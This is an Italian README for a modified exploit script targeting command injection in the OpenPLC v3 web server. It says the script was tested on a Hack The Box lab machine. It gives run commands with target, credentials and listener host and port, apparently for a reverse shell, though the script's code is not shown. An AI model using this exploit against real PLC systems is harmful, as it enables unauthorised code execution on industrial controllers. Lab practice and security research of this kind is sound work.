
OpenPLC 3 WebServer Esecuzione Remota di Codice Autenticata
OpenPLC 3 WebServer Esecuzione Remota di Codice Autenticata.
La presenza di Command Injection nel webserver Open PLC v3 consente a remoti attaccanti di eseguire codice arbitrario. Testato solo sulla macchina HTB Wifinetictwo.htb.
Ho riscontrato problemi con tutti gli script che sfruttavano la vulnerabilità, forse perché uso Parrot o il mio browser; Chromium funziona per il login, ho avuto problemi di login con Firefox e succede qualcosa di strano al server web con la richiesta POST per il login. Ho modificato lo script di thewhiteh4t ci sono parti (principalmente il metodo di upload) che sono solo copiate, ma ho cambiato la parte che ottiene i cookie dal server per lanciare l'exploit.
Il PoC originale è fornito da Fellipe Oliveira
Spero che ti sia utile se hai problemi con esso.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
In alternativa, puoi modificare exploit.py
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass